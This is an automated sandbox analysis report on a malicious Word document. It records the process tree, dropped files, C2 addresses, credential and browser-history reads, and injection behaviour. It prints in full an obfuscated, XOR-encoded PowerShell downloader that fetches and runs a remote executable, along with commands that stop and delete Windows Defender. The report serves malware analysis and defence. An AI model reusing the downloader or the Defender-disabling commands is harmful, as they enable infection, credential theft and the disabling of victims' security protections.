VMRay Analyzer Report for Sample #64186
Generated by VMRay Analyzer 2.3.0
DNS resolutions observed during analysis
  comprealm.net  Resolved_To  184.168.46.18
  www.icb.cl     Resolved_To  190.196.2.210

Process tree
Process 1 (PID 2368): winword.exe, parent PID 1312
  Command line: "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\program files (x86)\microsoft office\office12\winword.exe
  Recorded operations: Child_Of; Created (2); Opened (4)
Process 2 (PID 2568): powershell.exe, parent PID 2368
  Command line: PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'')
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
  Recorded operations: Child_Of; Created (5); Opened (76); Read_From (14); Deleted (1); Connected_To (2)
Process 3 (PID 2880): 280.exe, parent PID 2568
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\temp\280.exe
  Recorded operations: Child_Of; Created (3)
Process 4 (PID 2896): 280.exe, parent PID 2880
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\temp\280.exe
  Recorded operations: Child_Of; Created (5); Deleted (1); Moved (1)
Process 5 (PID 2916): syncpack.exe, parent PID 2896
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
  Recorded operations: Child_Of; Created (3)
Process 6 (PID 2928): syncpack.exe, parent PID 2916
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
  Recorded operations: Child_Of (6); Created (5); Copied (1); Opened (3); Deleted (3); Wrote_To (1); Connected_To (7)
Process 8 (PID 1268): syncpack.exe, parent PID 2928
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
  Recorded operations: Read_From (3); Created (1); Opened (39)
Process 9 (PID 100): oyvgkgw.exe, parent PID 2928
  Command line: "C:\ProgramData\oyvGkGw.exe"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\programdata\oyvgkgw.exe
  Recorded operations: Child_Of; Created (2); Opened (5)
Process 10 (PID 2208): syncpack.exe, parent PID 2928
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
  Recorded operations: Created (1); Opened (4)
Process 11 (PID 1832): syncpack.exe, parent PID 2928
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
  Recorded operations: Read_From (4); Created (1); Opened (4)
Process 12 (PID 2100): syncpack_.exe, parent PID 2928
  Command line: "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe
  Recorded operations: Opened (4)
Process 13 (PID 1972): surtq5qk9h.exe, parent PID 2928
  Command line: "C:\ProgramData\suRtQ5QK9h.exe"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\programdata\surtq5qk9h.exe
  Recorded operations: Opened (4); Created (1)
Process 14 (PID 1580): oyvgkgw.exe, parent PID 100
  Command line: "C:\ProgramData\oyvGkGw.exe"
  Working directory: C:\Users\kFT6uTQW\Desktop\
  Image path: c:\programdata\oyvgkgw.exe
  Recorded operations: Child_Of (4); Created (3); Copied (1); Modified_Properties_Of (2)
Process 15 (PID 316): cmd.exe, parent PID 1580
  Command line: /c sc stop WinDefend
  Working directory: C:\Windows\system32\
  Image path: c:\windows\syswow64\cmd.exe
  Recorded operations: Child_Of; Opened (5)
Process 16 (PID 1916): cmd.exe, parent PID 1580
  Command line: /c sc delete WinDefend
  Working directory: C:\Windows\system32\
  Image path: c:\windows\syswow64\cmd.exe
  Recorded operations: Child_Of; Opened (5)
Process 17 (PID 1608): cmd.exe, parent PID 1580
  Command line: /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  Working directory: C:\Windows\system32\
  Image path: c:\windows\syswow64\cmd.exe
  Recorded operations: Child_Of; Opened (5)
Process 18 (PID 2324): powershell.exe, parent PID 1608
  Command line: powershell Set-MpPreference -DisableRealtimeMonitoring $true
  Working directory: C:\Windows\system32\
  Image path: c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
  Recorded operations: Created (1); Opened (7)
Process 19 (PID 2468): sc.exe, parent PID 1916
  Command line: sc delete WinDefend
  Working directory: C:\Windows\system32\
  Image path: c:\windows\syswow64\sc.exe
  Recorded operations: Opened (1)
Process 20 (PID 2520): sc.exe, parent PID 316
  Command line: sc stop WinDefend
  Working directory: C:\Windows\system32\
  Image path: c:\windows\syswow64\sc.exe
  Recorded operations: Opened (1)
Process 21 (PID 512): dllhost.exe, parent PID 584
  Command line: C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  Working directory: C:\Windows\system32\
  Image path: c:\windows\syswow64\dllhost.exe
  Recorded operations: Child_Of
Process 22 (PID 980): oyvhkhw.exe, parent PID 512
  Command line: "C:\Users\kFT6uTQW\AppData\Roaming\tarutils\oyvHkHw.exe"
  Working directory: C:\Windows\system32\
  Image path: c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe
  Recorded operations: Opened (4); Created (1)
Artifacts (in the order the report lists them)

Files and registry keys: document stage and PowerShell host startup
  File: standard I/O handles (STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE)
  File: c:\users\kft6utqw\appdata\local\temp\vbe
  WinRegistryKey: 8804558B-B773-11d1-BC3E-0000F87552E7 (hive: INVALID)
  File: PowerShell type and format data in c:\windows\syswow64\windowspowershell\v1.0\ (extension ps1xml):
    getevent.types.ps1xml, types.ps1xml, diagnostics.format.ps1xml, wsman.format.ps1xml,
    certificate.format.ps1xml, dotnettypes.format.ps1xml, filesystem.format.ps1xml,
    help.format.ps1xml, powershellcore.format.ps1xml, powershelltrace.format.ps1xml,
    registry.format.ps1xml
  File: c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config (config)
  File: c:\users\kft6utqw\appdata\local\temp\280.exe (exe)
    MD5:    d41d8cd98f00b204e9800998ecf8427e
    SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
PowerShell runtime artifacts
  File: conout$
  Mutex: Global\.net clr networking (listed 4 times)
  WinRegistryKey (HKEY_LOCAL_MACHINE):
    Software\Microsoft\PowerShell\1\PowerShellEngine (value: ApplicationBase; queried repeatedly)
    System\CurrentControlSet\Control\Session Manager\Environment (value: PSMODULEPATH)
    SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell (value: path)
    SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN (value: StackVersion)
    SOFTWARE\Microsoft\PowerShell\1\ShellIds (value: PipelineMaxStackSizeMB)
    Software\Microsoft\Windows NT\CurrentVersion (value: InstallationType)
    SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance (values: Library, IsMultiInstance, First Counter)
    SYSTEM\CurrentControlSet\Services\.net clr networking\Performance (values: CategoryOptions, FileMappingSize, Counter Names)
    Software\Microsoft\PowerShell
    Software\Microsoft\PowerShell\1
    SYSTEM\CurrentControlSet\Services\EventLog and its subkeys (enumerated four times):
      Application, Application\PowerShell, HardwareEvents, HardwareEvents\PowerShell,
      Internet Explorer, Internet Explorer\PowerShell, Key Management Service,
      Key Management Service\PowerShell, Media Center, Media Center\PowerShell,
      ODiag, ODiag\PowerShell, OSession, OSession\PowerShell, Security, System,
      System\PowerShell, Windows PowerShell, Windows PowerShell\PowerShell
    SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
    SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
  WinRegistryKey (HKEY_CURRENT_USER):
    (hive root)
    Environment (value: PSMODULEPATH)
    SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Network artifacts (PowerShell stage)
  DNSRecord: comprealm.net
  DNSRecord: www.icb.cl
  SocketAddress: www.icb.cl:80
  NetworkConnection: HTTP to www.icb.cl:80
  URI: www.icb.cl/ZxavoDe/ (Contains)
  URI: None
Artifacts of the dropped executable (280.exe / syncpack.exe)
  Mutex: PEMA08
  Mutex: PEMB40
  File: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe:zone.identifier
  File: c:\users\kft6utqw\appdata\local\temp\280.exe (exe)
  File: C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe (exe)
    MD5:    bc1a4dc38f3236982d47496a1151f33f
    SHA1:   d112719238664d7996048614d75db8a67fc50fc5
    SHA256: 85f328a811ca9f10ad82bc3c68d3c348cb069d8378400bf191bb515a6aa63473
    Relation: Moved_To
  File: C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe (exe)
    Relation: Moved_From
  Mutex: Global\I78B0A7D7
  Mutex: Global\M78B0A7D7
  Mutex: PEMB50
  Mutex: PEMB64
  File: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe (exe)
    MD5:    d41d8cd98f00b204e9800998ecf8427e
    SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    Relation: Copied_To
  File: c:\windows\system32\alg.exe (exe)
    Relation: Copied_From
Artifacts of syncpack.exe (PID 2928): temporary files, second-stage binary, C2 traffic
  File: standard I/O handles (STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE)
  File: c:\users\kft6utqw\appdata\local\temp\d3a3.tmp (tmp)
    MD5:    d41d8cd98f00b204e9800998ecf8427e
    SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  File: c:\users\kft6utqw\appdata\local\temp\d3d3.tmp (tmp)
    MD5:    d41d8cd98f00b204e9800998ecf8427e
    SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  File: c:\users\kft6utqw\appdata\local\temp\d3d4.tmp (tmp)
    MD5:    d41d8cd98f00b204e9800998ecf8427e
    SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  File: c:\programdata\oyvgkgw.exe (exe)
    MD5:    cbe11e9a9e71737f15e8f1c606ad8d8c
    SHA1:   2d4575457d337753a57b7941d13ac9665342641a
    SHA256: 6e143481553f9ae7566d2245450f6fe65734b465df03e43905f0fb19f812b343
  Mutex: Global\Nx357ECDE7
  SocketAddress / NetworkConnection (HTTP):
    197.245.46.11:80
    216.46.44.93:80
    94.70.244.227:80
  URI: 197.245.46.11 (Contains)
  URI: 216.46.44.93 (Contains)
  URI: http://94.70.244.227:80/whoami.php (Contains)
  URI: 94.70.244.227 (listed twice; Contains)
Artifacts of syncpack.exe /scomma (PID 1268): mail and messaging client account locations read
  File (extension oeaccount), in c:\users\kft6utqw\appdata\local\microsoft\windows mail\:
    account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount
    account{1cd43f3b-668b-4ca8-b816-34f74122ec0f}.oeaccount
    account{af0db737-2ef9-4633-bf5e-1a6761ed1577}.oeaccount
  File: c:\users\kft6utqw\appdata\local\temp\d3a3.tmp (tmp)
  WinRegistryKey (HKEY_CURRENT_USER):
    Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38} (value: Username)
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
      (values: POP3 User, IMAP User, HTTP User, SMTP User)
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
      (values: POP3 User, POP3 Server, Display Name, Email, SMTP Server, SMTP Port, POP3 Port, POP3 Use SPA, POP3 Password, IMAP User, HTTP User, SMTP User)
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
      (values: POP3 User, IMAP User, HTTP User, SMTP User)
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary
      (values: POP3 User, IMAP User, HTTP User, SMTP User)
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Reminders
      (values: POP3 User, IMAP User, HTTP User, SMTP User)
    Software\Qualcomm\Eudora\CommandLine
    Software\Google\Google Talk\Accounts
    Software\Google\Google Desktop\Mailboxes
    Software\Microsoft\Internet Account Manager\Accounts
    Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
    Identities
    Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Internet Account Manager\Accounts
    Identities\{31810C36-5D23-4CCE-A3B4-316DED195C38}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\<subkey>, for each of:
      0a0d020000000000c000000000000046, 13dbb0c8aa05101a9bb000aa002fc45a,
      29091b5932ee0f48aec4673270b08577, 349c13b2d278c3458833b7862c0157f4,
      3517490d76624c419a828607e2a54604, 8503020000000000c000000000000046,
      882b4247eb9feb478bcaf90664ec624c, 9207f3e0a3b11019908b08002b2a56c2,
      9375CFF0413111d3B88A00104B2A6676, dfc6f427732b824da2ca53fc3cafb157,
      {D9734F19-8CFB-411D-BC59-833E334FCB5E}
    Software\Microsoft\Office\15.0\Outlook\Profiles
    Software\Microsoft\Office\16.0\Outlook\Profiles
    Software\IncrediMail\Identities
    Software\Microsoft\MSNMessenger
    Software\Microsoft\MessengerService
    Software\Yahoo\Pager
    Software\Microsoft\IdentityCRL
    Software\Microsoft\Windows Live Mail
  WinRegistryKey (HKEY_LOCAL_MACHINE):
    Software\Classes\Software\Qualcomm\Eudora\CommandLine\current
    Software\Mozilla\Mozilla Thunderbird
    Software\IncrediMail\Identities
    Software\Group Mail
Artifacts of oyvgkgw.exe (PID 100)
  File: standard I/O handles (STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE)
  Mutex: (unnamed in the report)
  WinRegistryKey (HKEY_CURRENT_USER): Software\Microsoft\Visual Basic\6.0 (value: AllowUnsafeObjectPassing)
  WinRegistryKey (HKEY_LOCAL_MACHINE): SOFTWARE\Microsoft\VBA\Monitors
Artifacts of syncpack.exe (PID 2208)
  File: c:\users\kft6utqw\appdata\local\temp\d3d3.tmp (tmp)
Artifacts of syncpack.exe /scomma (PID 1832)
  File: standard I/O handles (STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE)
  WinRegistryKey (HKEY_LOCAL_MACHINE): Software\Clients\Mail\Microsoft Outlook (value: DLLPathEx)
Artifacts of syncpack_.exe (PID 2100): browser history locations read
  File (extension dat):
    c:\users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\index.dat
    c:\users\kft6utqw\appdata\local\microsoft\windows\history\history.ie5\mshist012018062620180627\index.dat
    c:\users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\index.dat
    c:\users\kft6utqw\appdata\local\microsoft\windows\history\low\history.ie5\mshist012017071220170713\index.dat
  File: c:\users\kft6utqw\appdata\roaming\mozilla\firefox\profiles\p7ap74gw.default\places.sqlite (sqlite)
  WinRegistryKey: Mozilla Firefox 25.0\bin (hive: INVALID; value: PathToExe; queried 3 times)
  WinRegistryKey: Mozilla Firefox\bin (hive: INVALID)
Artifacts of surtq5qk9h.exe (PID 1972)
  File: standard I/O handles (STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE)
  WinRegistryKey (HKEY_LOCAL_MACHINE): Software\Clients\Mail\Microsoft Outlook (value: DLLPathEx)
Artifacts of oyvgkgw.exe (PID 1580): persistence copy and Windows Defender policy keys
  File: standard I/O handles (STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE)
  File: c:\users\kft6utqw\appdata\roaming\tarutils\oyvhkhw.exe (exe)
    MD5:    d41d8cd98f00b204e9800998ecf8427e
    SHA1:   da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    Relation: Copied_To
  File: c:\programdata\oyvgkgw.exe (exe)
    Relation: Copied_From
  File: c:\programdata\faq
  File: c:\users\kft6utqw\appdata\roaming\tarutils
  WinRegistryKey (HKEY_LOCAL_MACHINE): SOFTWARE\Policies\Microsoft\Windows Defender (value: DisableAntiSpyware)
  WinRegistryKey (HKEY_LOCAL_MACHINE): SOFTWARE\Microsoft\Windows Defender Security Center\Notifications (value: DisableNotifications)
Artifacts of the cmd.exe instances (PIDs 316, 1916, 1608)
  File: standard I/O handles (STD_OUTPUT_HANDLE, STD_INPUT_HANDLE)
  WinRegistryKey (HKEY_LOCAL_MACHINE): Software\Microsoft\Command Processor
    (values: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun; queried 3 times)
  WinRegistryKey (HKEY_CURRENT_USER): Software\Microsoft\Command Processor
    (values: DisableUNCCheck, EnableExtensions, DelayedExpansion, DefaultColor, CompletionChar, PathCompletionChar, AutoRun; queried 3 times)
  WinRegistryKey (HKEY_CURRENT_USER): Software\Policies\Microsoft\Windows\System
Artifacts of powershell.exe (PID 2324) and the sc.exe instances (PIDs 2468, 2520)
  File: standard I/O handles (STD_INPUT_HANDLE, STD_OUTPUT_HANDLE, STD_ERROR_HANDLE; listed repeatedly)
  File: conout$
  WinRegistryKey (HKEY_LOCAL_MACHINE): Software\Microsoft\PowerShell\1\PowerShellEngine (value: ApplicationBase; queried 3 times)
  WinRegistryKey (HKEY_LOCAL_MACHINE): Software\Microsoft\PowerShell
  WinRegistryKey (HKEY_LOCAL_MACHINE): Software\Microsoft\PowerShell\1
Analyzed Sample #64186
Malware Artifacts
64186
Sample-ID: #64186
Job-ID: #180623
This sample was analyzed by VMRay Analyzer 2.3.0 on a Windows 7 system
100
VTI Score based on VTI Database Version 2.7
Metadata of Sample File #64186
Submission-ID: #66018
C:\Users\kFT6uTQW\Desktop\022543.doc
doc
MD5: 5a51e63d898736046b20e5b7bbab88ae
SHA1: 6872e4301bba24de600600cbbb2434b244537134
SHA256: 3985bc09caa13dadf70187a20d271303c272a41404beb497ac6116a5722a05d1
Opened_By
Metadata of Analysis for Job-ID #180623
Timeout: False
x86 64-bit
6.1.7601.17514 (3844dbb9-2017-4967-be7a-a4a2c20430fa)
win7_64_sp1-mso2007
True
311.275
Windows 7
This is a property collection holding additional information about the VMRay analysis
VMRay Analyzer
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "PowersHell -join ((98,49 , 44 , 1 , 123 ,40 , 35 , 49, 107 ,41 ,36 ,44 , 35 ,37 ,50 ,102,8 ,35, 50, 104 , 17 , 35, 36 ,5 ,42, 47,35 , 40 , 50 , 125, 98,54, 50,4,123 , 97 , 46,50, 50 , 54 , 124,105 ,105, 37,41, 43, 54, 52 , 35 ,39, 42 ,43 ,104 , 40,35, 50,105 , 49 ,41 , 52 , 34, 54, 52 , 35, 53 , 53 ,105 ,119, 49, 9 ,44, 45 , 46 ,35 , 31,3, 126 ,105, 6, 46,50, 50, 54,124,105 , 105, 49,49,49 , 104,47,37 ,36, 104,37, 42 , 105 ,28, 62,39 , 48 ,41,2 , 35, 105, 6 ,46 ,50,50 ,54 , 124 , 105 ,105 , 49 , 49, 49 , 104 , 37 , 46 , 51, 40 , 33, 37 , 51, 53 ,39,43 ,53 , 41 ,52 , 39 , 54,52,47,43, 47 ,35 , 52 , 104, 37 ,41 , 43,105 ,2,17 ,126 ,34 , 30 , 35, 105, 6 ,46, 50 , 50,54,124 ,105,105 ,53 , 35 , 52, 48 ,47,37 , 35 , 107 ,54, 37, 104 ,37, 41 ,43, 104,52 ,41 , 105,113, 41 , 127, 41 , 54,11,31, 105 ,6, 46 ,50, 50 , 54 , 124, 105, 105 , 43 , 47 ,40 , 39, 43 , 47,104 ,37 , 41,43,104,50 ,49 , 105, 22, 114, 19, 2 ,1,54 , 105 ,97 ,104, 21 ,54 , 42,47 , 50 , 110 ,97 , 6,97,111 ,125, 98 , 0 , 28, 23, 102 , 123, 102 , 97 , 116, 126 ,118 , 97 , 125, 98, 9, 51 ,44, 123 , 98 , 35,40 , 48 ,124 , 50 , 35, 43,54 ,109 , 97 ,26 ,97,109, 98,0 , 28 , 23,109 , 97 ,104 , 35 , 62, 35,97 , 125 , 32 ,41 ,52 ,35 ,39,37,46, 110 , 98, 7 , 19, 19 ,102 , 47,40,102, 98,54 ,50 , 4 , 111 , 61,50 , 52 ,63 ,61 , 98, 49, 44 ,1,104,2 ,41 ,49 ,40 ,42,41,39 , 34 ,0 ,47 ,42 ,35 , 110 , 98, 7, 19,19,106 ,102,98 ,9,51,44, 111,125 , 21 ,50, 39 , 52 ,50, 107 ,22 ,52, 41,37, 35 ,53 , 53 ,102, 98 ,9 , 51, 44 ,125, 36 , 52, 35 ,39, 45,125 , 59 , 37 , 39 , 50, 37 ,46,61, 59 ,59 ) |%{ [CHAR]($_ -bXor"0x46" )} ) | . ( $ENv:COmSpeC[4,24,25]-Join'') ".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\.net clr networking".
Creates system object
Network
VTI rule match with VTI rule score 3/5
vmray_request_dns_by_name
Resolves host name "comprealm.net".
Performs DNS request
Network
VTI rule match with VTI rule score 3/5
vmray_request_dns_by_name
Resolves host name "www.icb.cl".
Performs DNS request
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Users\kFT6uTQW\AppData\Local\Temp\280.exe".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMA08".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMB40".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\I78B0A7D7".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\M78B0A7D7".
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMB50".
Creates system object
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "PEMB64".
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\ProgramData\oyvGkGw.exe".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3A3.tmp"".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" /scomma "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D4.tmp"".
Creates process
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates mutex with name "Global\Nx357ECDE7".
Creates system object
Browser
VTI rule match with VTI rule score 3/5
vmray_read_browser_history
Reads the browsing history for "Microsoft Internet Explorer".
Reads data related to browsing history
Process
VTI rule match with VTI rule score 1/5
vmray_install_ipc_endpoint
Creates nameless mutex.
Creates system object
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process ""C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack_.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"".
Creates process
Process
VTI rule match with VTI rule score 4/5
vmray_document_create_process
Creates process "C:\Windows\system32\cmd.exe".
Creates process
Information Stealing
VTI rule match with VTI rule score 4/5
vmray_readout_browser_credentials
Possibly trying to readout browser credentials.
Reads browser data
File System
VTI rule match with VTI rule score 2/5
vmray_handle_with_suspicious_files
File "c:\users\kft6utqw\appdata\local\temp\280.exe" is a known suspicious file.
Associated with suspicious files
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_memory
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" modifies memory of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe"
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_memory
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" modifies memory of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack_.exe"
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_memory
"c:\programdata\oyvgkgw.exe" modifies memory of "c:\programdata\oyvgkgw.exe"
Writes into the memory of a process running from a created or modified executable
Injection
VTI rule match with VTI rule score 5/5
vmray_modify_control_flow_non_system
"c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe" alters context of "c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe"
Modifies control flow of a process running from a created or modified executable
Injection
